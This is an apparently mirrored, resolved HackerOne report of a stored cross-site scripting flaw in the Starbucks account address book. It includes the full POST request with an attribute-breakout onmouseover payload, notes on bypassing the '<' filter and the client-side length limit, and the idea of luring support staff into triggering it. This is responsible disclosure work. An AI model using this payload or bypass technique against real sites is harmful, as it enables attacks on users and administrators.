Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Stored XSS in Adress Book (starbucks.com/account/profile)

Low
S
Starbucks
Submitted None
Actions:
View on HackerOne
Reported by myst404

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Generic
Hello, I just found a stored XSS in the "Adress book menu" of a user's profile : https://www.starbucks.com/account/profile # Description : XSS is happening due to the lack of filtering on the **Address.FirstName** parameter when you POST a new address on the URL : https://www.starbucks.com/account/profile/AddressSave : {F138388} {F138390} Here are the POST Parameters to reproduce the issue: {F138394} ``` Address.AddressName=bbbbb%22%3E&Address.FirstName=z%22 onmouseover="alert('Hackerone')" style="position:fixed;left:0;top:0;width:9999px;height:9999px;">&Address.LastName=bbbbb%22%3E&Address.Country=US&Address.AddressLine1=bbbbb%22%3E&Address.AddressLine2=aaaa%22%3E&Address.City=aaaa%22%3E&Address.CountrySubdivision=AK&Address.PostalCode=75000&Address.PhoneNumber=9901231093&Address.PhoneExtension=&Address.AddressType=Registration&Address.AddressId=32ecef14-f8af-4b5e-adad-d8d2adc8ddad&Address.VerificationStatus=Override&IsAddress=true&__RequestVerificationToken=MDSbXzmn-5j18ck06PpT7Og05zgwOzgq8FMwiqTXIeUfcfRS-keyp9i_x0VbBaIfvUo7EhzYGMvvzPUc0WG5QqlG_YathJ80lgs-p3PCoyNfdvo_E-XY6JfoC9R4tPir0 ``` It was quite tricky to leveraged. Indeed : - It looks like no parameter from this request is filtered. However, except **Address.FirstName**, they are printed are inside an HTML tag and you prevented the opening of a new tag by blocking anything with "<." (where the point can be anything of course) - The maximum length of each field (15 characters) is only checked client-side, though short XSS exists - That is why my final payload is : **z" onmouseover="alert('Hackerone')" style="position:fixed;left:0;top:0;width:9999px;height:9999px;">** Here is the email of my account if you can check by yourself: *██████* # Risks I assume that you perfectly know the risks of an XSS. This one presents a high/critical risk as my addresses can, I think, be seen in the admin panel. I just have to contact the Customer Support for them to look at my account and trigger the XSS. #Remediation I also assume that you know how to correct XSS properly as it looks like it is well done elsewhere on the website. Best regards,

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Generic